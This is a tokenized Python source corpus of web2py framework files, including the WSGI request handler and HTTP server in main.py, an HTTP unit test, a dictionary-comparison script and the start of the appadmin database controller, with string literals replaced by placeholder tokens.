encode_basestring_ascii = enc . py_encode_basestring_ascii <EOL> scan . make_scanner = scan . py_make_scanner <EOL> dec . make_scanner = scan . make_scanner <EOL> global _default_decoder <EOL> _default_decoder = JSONDecoder ( <EOL> encoding = None , <EOL> object_hook = None , <EOL> object_pairs_hook = None , <EOL> ) <EOL> global _default_encoder <EOL> _default_encoder = JSONEncoder ( <EOL> skipkeys = False , <EOL> ensure_ascii = True , <EOL> check_circular = True , <EOL> allow_nan = True , <EOL> indent = None , <EOL> separators = None , <EOL> encoding = '<STR_LIT:utf-8>' , <EOL> default = None , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> if False : import import_all <EOL> import gc <EOL> import Cookie <EOL> import os <EOL> import re <EOL> import copy <EOL> import sys <EOL> import time <EOL> import datetime <EOL> import signal <EOL> import socket <EOL> import random <EOL> import urllib2 <EOL> import string <EOL> try : <EOL> import simplejson as sj <EOL> except : <EOL> try : <EOL> import json as sj <EOL> except : <EOL> import gluon . contrib . simplejson as sj <EOL> from thread import allocate_lock <EOL> from gluon . fileutils import abspath , write_file <EOL> from gluon . settings import global_settings <EOL> from gluon . utils import web2py_uuid <EOL> from gluon . admin import add_path_first , create_missing_folders , create_missing_app_folders <EOL> from gluon . globals import current <EOL> web2py_path = global_settings . applications_parent <EOL> create_missing_folders ( ) <EOL> import logging <EOL> import logging . config <EOL> import gluon . messageboxhandler <EOL> logging . gluon = gluon <EOL> import locale <EOL> locale . setlocale ( locale . LC_CTYPE , "<STR_LIT:C>" ) <EOL> exists = os . path . exists <EOL> pjoin = os . path . join <EOL> logpath = abspath ( "<STR_LIT>" ) <EOL> if exists ( logpath ) : <EOL> logging . config . fileConfig ( abspath ( "<STR_LIT>" ) ) <EOL> else : <EOL> logging . basicConfig ( ) <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> from gluon . restricted import RestrictedError <EOL> from gluon . http import HTTP , redirect <EOL> from gluon . globals import Request , Response , Session <EOL> from gluon . compileapp import build_environment , run_models_in , run_controller_in , run_view_in <EOL> from gluon . contenttype import contenttype <EOL> from gluon . dal import BaseAdapter <EOL> from gluon . validators import CRYPT <EOL> from gluon . html import URL , xmlescape <EOL> from gluon . utils import is_valid_ip_address , getipaddrinfo <EOL> from gluon . 
rewrite import load , url_in , THREAD_LOCAL as rwthread , try_rewrite_on_error , fixup_missing_path_info <EOL> from gluon import newcron <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> requests = <NUM_LIT:0> <EOL> regex_client = re . compile ( '<STR_LIT>' ) <EOL> try : <EOL> version_info = open ( pjoin ( global_settings . gluon_parent , '<STR_LIT>' ) , '<STR_LIT:r>' ) <EOL> raw_version_string = version_info . read ( ) . split ( ) [ - <NUM_LIT:1> ] . strip ( ) <EOL> version_info . close ( ) <EOL> global_settings . web2py_version = raw_version_string <EOL> web2py_version = global_settings . web2py_version <EOL> except : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> try : <EOL> from gluon import rocket <EOL> except : <EOL> if not global_settings . web2py_runtime_gae : <EOL> logger . warn ( '<STR_LIT>' ) <EOL> load ( ) <EOL> HTTPS_SCHEMES = set ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def get_client ( env ) : <EOL> """<STR_LIT>""" <EOL> eget = env . get <EOL> g = regex_client . search ( eget ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> client = ( g . group ( ) or '<STR_LIT>' ) . split ( '<STR_LIT:U+002C>' ) [ <NUM_LIT:0> ] if g else None <EOL> if client in ( None , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> g = regex_client . search ( eget ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if g : <EOL> client = g . group ( ) <EOL> elif env . http_host . startswith ( '<STR_LIT:[>' ) : <EOL> client = '<STR_LIT>' <EOL> else : <EOL> client = '<STR_LIT:127.0.0.1>' <EOL> if not is_valid_ip_address ( client ) : <EOL> raise HTTP ( <NUM_LIT> , "<STR_LIT>" % client ) <EOL> return client <EOL> def serve_controller ( request , response , session ) : <EOL> """<STR_LIT>""" <EOL> environment = build_environment ( request , response , session ) <EOL> response . view = '<STR_LIT>' % ( request . controller , <EOL> request . function , <EOL> request . extension ) <EOL> run_models_in ( environment ) <EOL> response . _view_environment = copy . 
copy ( environment ) <EOL> page = run_controller_in ( request . controller , request . function , environment ) <EOL> if isinstance ( page , dict ) : <EOL> response . _vars = page <EOL> response . _view_environment . update ( page ) <EOL> run_view_in ( response . _view_environment ) <EOL> page = response . body . getvalue ( ) <EOL> global requests <EOL> requests = ( '<STR_LIT>' in globals ( ) ) and ( requests + <NUM_LIT:1> ) % <NUM_LIT:100> or <NUM_LIT:0> <EOL> if not requests : <EOL> gc . collect ( ) <EOL> default_headers = [ <EOL> ( '<STR_LIT:Content-Type>' , contenttype ( '<STR_LIT:.>' + request . extension ) ) , <EOL> ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , time . strftime ( '<STR_LIT>' , <EOL> time . gmtime ( ) ) ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> for key , value in default_headers : <EOL> response . headers . setdefault ( key , value ) <EOL> raise HTTP ( response . status , page , ** response . headers ) <EOL> class LazyWSGI ( object ) : <EOL> def __init__ ( self , environ , request , response ) : <EOL> self . wsgi_environ = environ <EOL> self . request = request <EOL> self . response = response <EOL> @ property <EOL> def environ ( self ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> new_environ = self . wsgi_environ <EOL> new_environ [ '<STR_LIT>' ] = self . request . body <EOL> new_environ [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> self . _environ = new_environ <EOL> return self . _environ <EOL> def start_response ( self , status = '<STR_LIT>' , headers = [ ] , exec_info = None ) : <EOL> """<STR_LIT>""" <EOL> self . response . status = str ( status ) . split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> self . response . headers = dict ( headers ) <EOL> return lambda * args , ** kargs : self . response . 
write ( escape = False , * args , ** kargs ) <EOL> def middleware ( self , * middleware_apps ) : <EOL> """<STR_LIT>""" <EOL> def middleware ( f ) : <EOL> def app ( environ , start_response ) : <EOL> data = f ( ) <EOL> start_response ( self . response . status , <EOL> self . response . headers . items ( ) ) <EOL> if isinstance ( data , list ) : <EOL> return data <EOL> return [ data ] <EOL> for item in middleware_apps : <EOL> app = item ( app ) <EOL> def caller ( app ) : <EOL> return app ( self . environ , self . start_response ) <EOL> return lambda caller = caller , app = app : caller ( app ) <EOL> return middleware <EOL> def wsgibase ( environ , responder ) : <EOL> """<STR_LIT>""" <EOL> eget = environ . get <EOL> current . __dict__ . clear ( ) <EOL> request = Request ( environ ) <EOL> response = Response ( ) <EOL> session = Session ( ) <EOL> env = request . env <EOL> env . web2py_version = web2py_version <EOL> static_file = False <EOL> try : <EOL> try : <EOL> try : <EOL> fixup_missing_path_info ( environ ) <EOL> ( static_file , version , environ ) = url_in ( request , environ ) <EOL> response . status = env . web2py_status_code or response . status <EOL> if static_file : <EOL> if eget ( '<STR_LIT>' , '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) : <EOL> response . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if version : <EOL> response . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> response . headers [ <EOL> '<STR_LIT>' ] = '<STR_LIT>' <EOL> response . stream ( static_file , request = request ) <EOL> app = request . application <EOL> if not global_settings . local_hosts : <EOL> local_hosts = set ( [ '<STR_LIT:127.0.0.1>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if not global_settings . web2py_runtime_gae : <EOL> try : <EOL> fqdn = socket . getfqdn ( ) <EOL> local_hosts . add ( socket . gethostname ( ) ) <EOL> local_hosts . add ( fqdn ) <EOL> local_hosts . 
update ( [ <EOL> addrinfo [ <NUM_LIT:4> ] [ <NUM_LIT:0> ] for addrinfo <EOL> in getipaddrinfo ( fqdn ) ] ) <EOL> if env . server_name : <EOL> local_hosts . add ( env . server_name ) <EOL> local_hosts . update ( [ <EOL> addrinfo [ <NUM_LIT:4> ] [ <NUM_LIT:0> ] for addrinfo <EOL> in getipaddrinfo ( env . server_name ) ] ) <EOL> except ( socket . gaierror , TypeError ) : <EOL> pass <EOL> global_settings . local_hosts = list ( local_hosts ) <EOL> else : <EOL> local_hosts = global_settings . local_hosts <EOL> client = get_client ( env ) <EOL> x_req_with = str ( env . http_x_requested_with ) . lower ( ) <EOL> request . update ( <EOL> client = client , <EOL> folder = abspath ( '<STR_LIT>' , app ) + os . sep , <EOL> ajax = x_req_with == '<STR_LIT>' , <EOL> cid = env . http_web2py_component_element , <EOL> is_local = env . remote_addr in local_hosts , <EOL> is_https = env . wsgi_url_scheme in HTTPS_SCHEMES or request . env . http_x_forwarded_proto in HTTPS_SCHEMES or env . https == '<STR_LIT>' <EOL> ) <EOL> request . compute_uuid ( ) <EOL> request . url = environ [ '<STR_LIT>' ] <EOL> disabled = pjoin ( request . folder , '<STR_LIT>' ) <EOL> if not exists ( request . folder ) : <EOL> if app == rwthread . routes . default_application and app != '<STR_LIT>' : <EOL> redirect ( URL ( '<STR_LIT>' , '<STR_LIT:default>' , '<STR_LIT:index>' ) ) <EOL> elif rwthread . routes . error_handler : <EOL> _handler = rwthread . routes . error_handler <EOL> redirect ( URL ( _handler [ '<STR_LIT>' ] , <EOL> _handler [ '<STR_LIT>' ] , <EOL> _handler [ '<STR_LIT>' ] , <EOL> args = app ) ) <EOL> else : <EOL> raise HTTP ( <NUM_LIT> , rwthread . routes . error_message <EOL> % '<STR_LIT>' , <EOL> web2py_error = '<STR_LIT>' ) <EOL> elif not request . is_local and exists ( disabled ) : <EOL> raise HTTP ( <NUM_LIT> , "<STR_LIT>" ) <EOL> create_missing_app_folders ( request ) <EOL> request . wsgi = LazyWSGI ( environ , request , response ) <EOL> if env . http_cookie : <EOL> try : <EOL> request . 
cookies . load ( env . http_cookie ) <EOL> except Cookie . CookieError , e : <EOL> pass <EOL> if not env . web2py_disable_session : <EOL> session . connect ( request , response ) <EOL> if global_settings . debugging and app != "<STR_LIT>" : <EOL> import gluon . debug <EOL> gluon . debug . dbg . do_debug ( mainpyfile = request . folder ) <EOL> serve_controller ( request , response , session ) <EOL> except HTTP , http_response : <EOL> if static_file : <EOL> return http_response . to ( responder , env = env ) <EOL> if request . body : <EOL> request . body . close ( ) <EOL> if hasattr ( current , '<STR_LIT>' ) : <EOL> session . _try_store_in_db ( request , response ) <EOL> if response . do_not_commit is True : <EOL> BaseAdapter . close_all_instances ( None ) <EOL> elif response . custom_commit : <EOL> BaseAdapter . close_all_instances ( response . custom_commit ) <EOL> else : <EOL> BaseAdapter . close_all_instances ( '<STR_LIT>' ) <EOL> session . _try_store_in_cookie_or_file ( request , response ) <EOL> if request . cid : <EOL> http_response . headers . setdefault ( <EOL> '<STR_LIT>' , '<STR_LIT:replace>' ) <EOL> if request . ajax : <EOL> if response . flash : <EOL> http_response . headers [ '<STR_LIT>' ] = urllib2 . quote ( xmlescape ( response . flash ) . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) ) <EOL> if response . js : <EOL> http_response . headers [ '<STR_LIT>' ] = urllib2 . quote ( response . js . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) ) <EOL> session . _fixup_before_save ( ) <EOL> http_response . cookies2headers ( response . cookies ) <EOL> ticket = None <EOL> except RestrictedError , e : <EOL> if request . body : <EOL> request . body . close ( ) <EOL> if not request . tickets_db : <EOL> ticket = e . log ( request ) or '<STR_LIT>' <EOL> if response . _custom_rollback : <EOL> response . _custom_rollback ( ) <EOL> else : <EOL> BaseAdapter . close_all_instances ( '<STR_LIT>' ) <EOL> if request . tickets_db : <EOL> ticket = e . 
log ( request ) or '<STR_LIT>' <EOL> http_response = HTTP ( <NUM_LIT> , rwthread . routes . error_message_ticket % <EOL> dict ( ticket = ticket ) , <EOL> web2py_error = '<STR_LIT>' % ticket ) <EOL> except : <EOL> if request . body : <EOL> request . body . close ( ) <EOL> try : <EOL> if response . _custom_rollback : <EOL> response . _custom_rollback ( ) <EOL> else : <EOL> BaseAdapter . close_all_instances ( '<STR_LIT>' ) <EOL> except : <EOL> pass <EOL> e = RestrictedError ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , locals ( ) ) <EOL> ticket = e . log ( request ) or '<STR_LIT>' <EOL> http_response = HTTP ( <NUM_LIT> , rwthread . routes . error_message_ticket <EOL> % dict ( ticket = ticket ) , <EOL> web2py_error = '<STR_LIT>' % ticket ) <EOL> finally : <EOL> if response and hasattr ( response , '<STR_LIT>' ) and response . session_file : <EOL> response . session_file . close ( ) <EOL> session . _unlock ( response ) <EOL> http_response , new_environ = try_rewrite_on_error ( <EOL> http_response , request , environ , ticket ) <EOL> if not http_response : <EOL> return wsgibase ( new_environ , responder ) <EOL> if global_settings . web2py_crontype == '<STR_LIT>' : <EOL> newcron . softcron ( global_settings . applications_parent ) . start ( ) <EOL> return http_response . to ( responder , env = env ) <EOL> def save_password ( password , port ) : <EOL> """<STR_LIT>""" <EOL> password_file = abspath ( '<STR_LIT>' % port ) <EOL> if password == '<STR_LIT>' : <EOL> chars = string . letters + string . digits <EOL> password = '<STR_LIT>' . join ( [ random . choice ( chars ) for i in range ( <NUM_LIT:8> ) ] ) <EOL> cpassword = CRYPT ( ) ( password ) [ <NUM_LIT:0> ] <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' % password <EOL> print '<STR_LIT>' <EOL> elif password == '<STR_LIT>' : <EOL> if exists ( password_file ) : <EOL> return <EOL> else : <EOL> password = '<STR_LIT>' <EOL> elif password . 
startswith ( '<STR_LIT>' ) : <EOL> cpassword = password [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> else : <EOL> cpassword = CRYPT ( ) ( password ) [ <NUM_LIT:0> ] <EOL> fp = open ( password_file , '<STR_LIT:w>' ) <EOL> if password : <EOL> fp . write ( '<STR_LIT>' % cpassword ) <EOL> else : <EOL> fp . write ( '<STR_LIT>' ) <EOL> fp . close ( ) <EOL> def appfactory ( wsgiapp = wsgibase , <EOL> logfilename = '<STR_LIT>' , <EOL> profiler_dir = None , <EOL> profilerfilename = None ) : <EOL> """<STR_LIT>""" <EOL> if profilerfilename is not None : <EOL> raise BaseException ( "<STR_LIT>" ) <EOL> if profiler_dir : <EOL> profiler_dir = abspath ( profiler_dir ) <EOL> logger . warn ( '<STR_LIT>' , profiler_dir ) <EOL> if not os . path . isdir ( profiler_dir ) : <EOL> try : <EOL> os . makedirs ( profiler_dir ) <EOL> except : <EOL> raise BaseException ( "<STR_LIT>" % profiler_dir ) <EOL> filepath = pjoin ( profiler_dir , '<STR_LIT>' ) <EOL> try : <EOL> filehandle = open ( filepath , '<STR_LIT:w>' ) <EOL> filehandle . close ( ) <EOL> os . unlink ( filepath ) <EOL> except IOError : <EOL> raise BaseException ( "<STR_LIT>" % profiler_dir ) <EOL> def app_with_logging ( environ , responder ) : <EOL> """<STR_LIT>""" <EOL> status_headers = [ ] <EOL> def responder2 ( s , h ) : <EOL> """<STR_LIT>""" <EOL> status_headers . append ( s ) <EOL> status_headers . append ( h ) <EOL> return responder ( s , h ) <EOL> time_in = time . time ( ) <EOL> ret = [ <NUM_LIT:0> ] <EOL> if not profiler_dir : <EOL> ret [ <NUM_LIT:0> ] = wsgiapp ( environ , responder2 ) <EOL> else : <EOL> import cProfile <EOL> prof = cProfile . Profile ( ) <EOL> prof . enable ( ) <EOL> ret [ <NUM_LIT:0> ] = wsgiapp ( environ , responder2 ) <EOL> prof . disable ( ) <EOL> destfile = pjoin ( profiler_dir , "<STR_LIT>" % web2py_uuid ( ) ) <EOL> prof . dump_stats ( destfile ) <EOL> try : <EOL> line = '<STR_LIT>' % ( <EOL> environ [ '<STR_LIT>' ] , <EOL> datetime . datetime . today ( ) . 
strftime ( '<STR_LIT>' ) , <EOL> environ [ '<STR_LIT>' ] , <EOL> environ [ '<STR_LIT>' ] . replace ( '<STR_LIT:U+002C>' , '<STR_LIT>' ) , <EOL> environ [ '<STR_LIT>' ] , <EOL> ( status_headers [ <NUM_LIT:0> ] ) [ : <NUM_LIT:3> ] , <EOL> time . time ( ) - time_in , <EOL> ) <EOL> if not logfilename : <EOL> sys . stdout . write ( line ) <EOL> elif isinstance ( logfilename , str ) : <EOL> write_file ( logfilename , line , '<STR_LIT:a>' ) <EOL> else : <EOL> logfilename . write ( line ) <EOL> except : <EOL> pass <EOL> return ret [ <NUM_LIT:0> ] <EOL> return app_with_logging <EOL> class HttpServer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( <EOL> self , <EOL> ip = '<STR_LIT:127.0.0.1>' , <EOL> port = <NUM_LIT> , <EOL> password = '<STR_LIT>' , <EOL> pid_filename = '<STR_LIT>' , <EOL> log_filename = '<STR_LIT>' , <EOL> profiler_dir = None , <EOL> ssl_certificate = None , <EOL> ssl_private_key = None , <EOL> ssl_ca_certificate = None , <EOL> min_threads = None , <EOL> max_threads = None , <EOL> server_name = None , <EOL> request_queue_size = <NUM_LIT:5> , <EOL> timeout = <NUM_LIT:10> , <EOL> socket_timeout = <NUM_LIT:1> , <EOL> shutdown_timeout = None , <EOL> path = None , <EOL> interfaces = None <EOL> ) : <EOL> """<STR_LIT>""" <EOL> if interfaces : <EOL> import types <EOL> if isinstance ( interfaces , types . ListType ) : <EOL> for i in interfaces : <EOL> if not isinstance ( i , types . TupleType ) : <EOL> raise "<STR_LIT>" <EOL> else : <EOL> raise "<STR_LIT>" <EOL> if path : <EOL> global web2py_path <EOL> path = os . path . normpath ( path ) <EOL> web2py_path = path <EOL> global_settings . applications_parent = path <EOL> os . chdir ( path ) <EOL> [ add_path_first ( p ) for p in ( path , abspath ( '<STR_LIT>' ) , "<STR_LIT>" ) ] <EOL> if exists ( "<STR_LIT>" ) : <EOL> logging . config . fileConfig ( "<STR_LIT>" ) <EOL> save_password ( password , port ) <EOL> self . pid_filename = pid_filename <EOL> if not server_name : <EOL> server_name = socket . 
gethostname ( ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> rocket . SERVER_NAME = server_name <EOL> rocket . SOCKET_TIMEOUT = socket_timeout <EOL> sock_list = [ ip , port ] <EOL> if not ssl_certificate or not ssl_private_key : <EOL> logger . info ( '<STR_LIT>' ) <EOL> elif not rocket . ssl : <EOL> logger . warning ( '<STR_LIT>' ) <EOL> elif not exists ( ssl_certificate ) : <EOL> logger . warning ( '<STR_LIT>' ) <EOL> elif not exists ( ssl_private_key ) : <EOL> logger . warning ( '<STR_LIT>' ) <EOL> else : <EOL> sock_list . extend ( [ ssl_private_key , ssl_certificate ] ) <EOL> if ssl_ca_certificate : <EOL> sock_list . append ( ssl_ca_certificate ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> app_info = { '<STR_LIT>' : appfactory ( wsgibase , <EOL> log_filename , <EOL> profiler_dir ) } <EOL> self . server = rocket . Rocket ( interfaces or tuple ( sock_list ) , <EOL> method = '<STR_LIT>' , <EOL> app_info = app_info , <EOL> min_threads = min_threads , <EOL> max_threads = max_threads , <EOL> queue_size = int ( request_queue_size ) , <EOL> timeout = int ( timeout ) , <EOL> handle_signals = False , <EOL> ) <EOL> def start ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> signal . signal ( signal . SIGTERM , lambda a , b , s = self : s . stop ( ) ) <EOL> signal . signal ( signal . SIGINT , lambda a , b , s = self : s . stop ( ) ) <EOL> except : <EOL> pass <EOL> write_file ( self . pid_filename , str ( os . getpid ( ) ) ) <EOL> self . server . start ( ) <EOL> def stop ( self , stoplogging = False ) : <EOL> """<STR_LIT>""" <EOL> newcron . stopcron ( ) <EOL> self . server . stop ( stoplogging ) <EOL> try : <EOL> os . unlink ( self . pid_filename ) <EOL> except : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import os <EOL> import unittest <EOL> def fix_sys_path ( ) : <EOL> """<STR_LIT>""" <EOL> def add_path_first ( path ) : <EOL> sys . path = [ path ] + [ p for p in sys . path if ( <EOL> not p == path and not p == ( path + '<STR_LIT:/>' ) ) ] <EOL> path = os . path . dirname ( os . path . abspath ( __file__ ) ) <EOL> if not os . path . isfile ( os . path . join ( path , '<STR_LIT>' ) ) : <EOL> i = <NUM_LIT:0> <EOL> while i < <NUM_LIT:10> : <EOL> i += <NUM_LIT:1> <EOL> if os . path . exists ( os . path . join ( path , '<STR_LIT>' ) ) : <EOL> break <EOL> path = os . path . abspath ( os . path . join ( path , '<STR_LIT:..>' ) ) <EOL> paths = [ path , <EOL> os . path . abspath ( os . path . join ( path , '<STR_LIT>' ) ) , <EOL> os . path . abspath ( os . path . join ( path , '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' ] <EOL> [ add_path_first ( path ) for path in paths ] <EOL> fix_sys_path ( ) <EOL> from http import HTTP , defined_status <EOL> class TestHTTP ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_status_message ( self ) : <EOL> """<STR_LIT>""" <EOL> h = HTTP <EOL> def gen_status_str ( code , message ) : <EOL> return str ( code ) + '<STR_LIT:U+0020>' + str ( message ) <EOL> message = '<STR_LIT>' <EOL> code = <NUM_LIT> <EOL> self . assertEqual ( str ( h ( gen_status_str ( code , message ) ) ) , <EOL> gen_status_str ( code , message ) ) <EOL> for code in defined_status . keys ( ) : <EOL> self . assertEqual ( <EOL> str ( h ( code ) ) , <EOL> gen_status_str ( code , defined_status [ code ] ) ) <EOL> for code in defined_status . keys ( ) : <EOL> self . assertEqual ( str ( h ( gen_status_str ( code , message ) ) ) , <EOL> gen_status_str ( code , message ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> '''<STR_LIT>''' <EOL> __docformat__ = "<STR_LIT>" <EOL> import getopt <EOL> import os . path <EOL> import sys <EOL> def main ( argv ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> opts , args = getopt . getopt ( argv , "<STR_LIT:h>" , [ "<STR_LIT>" ] ) <EOL> except getopt . GetoptError : <EOL> exit_with_parsing_error ( ) <EOL> for opt , arg in opts : <EOL> arg = arg <EOL> if opt in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> usage ( ) <EOL> sys . exit ( ) <EOL> if len ( args ) == <NUM_LIT:2> : <EOL> params = list ( get_dicts ( * args ) ) <EOL> params . extend ( get_dict_names ( * args ) ) <EOL> compare_dicts ( * params ) <EOL> else : <EOL> exit_with_parsing_error ( ) <EOL> def exit_with_parsing_error ( ) : <EOL> """<STR_LIT>""" <EOL> print ( "<STR_LIT>" ) <EOL> usage ( ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> def usage ( ) : <EOL> """<STR_LIT>""" <EOL> print ( __doc__ ) <EOL> def get_dicts ( dict_path1 , dict_path2 ) : <EOL> """<STR_LIT>""" <EOL> return eval ( open ( dict_path1 ) . read ( ) ) , eval ( open ( dict_path2 ) . read ( ) ) <EOL> def get_dict_names ( dict1_path , dict2_path ) : <EOL> """<STR_LIT>""" <EOL> dict1_name = os . path . basename ( dict1_path ) <EOL> dict2_name = os . path . basename ( dict2_path ) <EOL> if dict1_name == dict2_name : <EOL> dict1_name = "<STR_LIT>" <EOL> dict2_name = "<STR_LIT>" <EOL> return dict1_name , dict2_name <EOL> def compare_dicts ( dict1 , dict2 , dict1_name , dict2_name ) : <EOL> """<STR_LIT>""" <EOL> dict1_keyset = set ( dict1 . keys ( ) ) <EOL> dict2_keyset = set ( dict2 . 
keys ( ) ) <EOL> print_key_diff ( dict1_keyset - dict2_keyset , dict1_name , dict2_name ) <EOL> print_key_diff ( dict2_keyset - dict1_keyset , dict2_name , dict1_name ) <EOL> print "<STR_LIT>" <EOL> has_value_differences = False <EOL> for key in dict1_keyset & dict2_keyset : <EOL> if dict1 [ key ] != dict2 [ key ] : <EOL> print "<STR_LIT>" % ( key , ) <EOL> print "<STR_LIT>" % ( dict1_name , dict1 [ key ] , ) <EOL> print "<STR_LIT>" % ( dict2_name , dict2 [ key ] , ) <EOL> print <EOL> has_value_differences = True <EOL> if not has_value_differences : <EOL> print "<STR_LIT>" <EOL> def print_key_diff ( key_diff , dict1_name , dict2_name ) : <EOL> """<STR_LIT>""" <EOL> print "<STR_LIT>" % ( dict1_name , dict2_name ) <EOL> if len ( key_diff ) : <EOL> for key in key_diff : <EOL> print "<STR_LIT>" % ( key , ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> print <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( sys . argv [ <NUM_LIT:1> : ] ) </s>
<s> import os <EOL> import socket <EOL> import datetime <EOL> import copy <EOL> import gluon . contenttype <EOL> import gluon . fileutils <EOL> try : <EOL> import pygraphviz as pgv <EOL> except ImportError : <EOL> pgv = None <EOL> global_env = copy . copy ( globals ( ) ) <EOL> global_env [ '<STR_LIT>' ] = datetime <EOL> http_host = request . env . http_host . split ( '<STR_LIT::>' ) [ <NUM_LIT:0> ] <EOL> remote_addr = request . env . remote_addr <EOL> try : <EOL> hosts = ( http_host , socket . gethostname ( ) , <EOL> socket . gethostbyname ( http_host ) , <EOL> '<STR_LIT>' , '<STR_LIT:127.0.0.1>' , '<STR_LIT>' ) <EOL> except : <EOL> hosts = ( http_host , ) <EOL> if request . env . http_x_forwarded_for or request . is_https : <EOL> session . secure ( ) <EOL> elif ( remote_addr not in hosts ) and ( remote_addr != "<STR_LIT:127.0.0.1>" ) and ( request . function != '<STR_LIT>' ) : <EOL> raise HTTP ( <NUM_LIT:200> , T ( '<STR_LIT>' ) ) <EOL> if request . function == '<STR_LIT>' : <EOL> if not '<STR_LIT>' in globals ( ) or not request . args : <EOL> redirect ( URL ( request . controller , '<STR_LIT:index>' ) ) <EOL> manager_action = auth . settings . manager_actions . get ( request . args ( <NUM_LIT:0> ) , None ) <EOL> if manager_action is None and request . args ( <NUM_LIT:0> ) == '<STR_LIT>' : <EOL> manager_action = dict ( role = auth . settings . auth_manager_role , <EOL> heading = T ( '<STR_LIT>' ) , <EOL> tables = [ auth . table_user ( ) , <EOL> auth . table_group ( ) , <EOL> auth . table_permission ( ) ] ) <EOL> manager_role = manager_action . get ( '<STR_LIT>' , None ) if manager_action else None <EOL> auth . requires_membership ( manager_role ) ( lambda : None ) ( ) <EOL> menu = False <EOL> elif ( request . application == '<STR_LIT>' and not session . authorized ) or ( request . application != '<STR_LIT>' and not gluon . fileutils . 
check_credentials ( request ) ) : <EOL> redirect ( URL ( '<STR_LIT>' , '<STR_LIT:default>' , '<STR_LIT:index>' , <EOL> vars = dict ( send = URL ( args = request . args , vars = request . vars ) ) ) ) <EOL> else : <EOL> response . subtitle = T ( '<STR_LIT>' ) <EOL> menu = True <EOL> ignore_rw = True <EOL> response . view = '<STR_LIT>' <EOL> if menu : <EOL> response . menu = [ [ T ( '<STR_LIT>' ) , False , URL ( '<STR_LIT>' , '<STR_LIT:default>' , '<STR_LIT>' , <EOL> args = [ request . application ] ) ] , [ T ( '<STR_LIT>' ) , False , <EOL> URL ( '<STR_LIT:index>' ) ] , [ T ( '<STR_LIT:state>' ) , False , <EOL> URL ( '<STR_LIT:state>' ) ] , [ T ( '<STR_LIT>' ) , False , <EOL> URL ( '<STR_LIT>' ) ] ] <EOL> if False and request . tickets_db : <EOL> from gluon . restricted import TicketStorage <EOL> ts = TicketStorage ( ) <EOL> ts . _get_table ( request . tickets_db , ts . tablename , request . application ) <EOL> def get_databases ( request ) : <EOL> dbs = { } <EOL> for ( key , value ) in global_env . items ( ) : <EOL> cond = False <EOL> try : <EOL> cond = isinstance ( value , GQLDB ) <EOL> except : <EOL> cond = isinstance ( value , SQLDB ) <EOL> if cond : <EOL> dbs [ key ] = value <EOL> return dbs <EOL> databases = get_databases ( None ) <EOL> def eval_in_global_env ( text ) : <EOL> exec ( '<STR_LIT>' % text , { } , global_env ) <EOL> return global_env [ '<STR_LIT>' ] <EOL> def get_database ( request ) : <EOL> if request . args and request . args [ <NUM_LIT:0> ] in databases : <EOL> return eval_in_global_env ( request . args [ <NUM_LIT:0> ] ) <EOL> else : <EOL> session . flash = T ( '<STR_LIT>' ) <EOL> redirect ( URL ( '<STR_LIT:index>' ) ) <EOL> def get_table ( request ) : <EOL> db = get_database ( request ) <EOL> if len ( request . args ) > <NUM_LIT:1> and request . args [ <NUM_LIT:1> ] in db . tables : <EOL> return ( db , request . args [ <NUM_LIT:1> ] ) <EOL> else : <EOL> session . 
flash = T ( '<STR_LIT>' ) <EOL> redirect ( URL ( '<STR_LIT:index>' ) ) <EOL> def get_query ( request ) : <EOL> try : <EOL> return eval_in_global_env ( request . vars . query ) <EOL> except Exception : <EOL> return None <EOL> def query_by_table_type ( tablename , db , request = request ) : <EOL> keyed = hasattr ( db [ tablename ] , '<STR_LIT>' ) <EOL> if keyed : <EOL> firstkey = db [ tablename ] [ db [ tablename ] . _primarykey [ <NUM_LIT:0> ] ] <EOL> cond = '<STR_LIT>' <EOL> if firstkey . type in [ '<STR_LIT:string>' , '<STR_LIT:text>' ] : <EOL> cond = '<STR_LIT>' <EOL> qry = '<STR_LIT>' % ( <EOL> request . args [ <NUM_LIT:0> ] , request . args [ <NUM_LIT:1> ] , firstkey . name , cond ) <EOL> else : <EOL> qry = '<STR_LIT>' % tuple ( request . args [ : <NUM_LIT:2> ] ) <EOL> return qry <EOL> def index ( ) : <EOL> return dict ( databases = databases ) <EOL> def insert ( ) : <EOL> ( db , table ) = get_table ( request ) <EOL> form = SQLFORM ( db [ table ] , ignore_rw = ignore_rw ) <EOL> if form . accepts ( request . vars , session ) : <EOL> response . flash = T ( '<STR_LIT>' ) <EOL> return dict 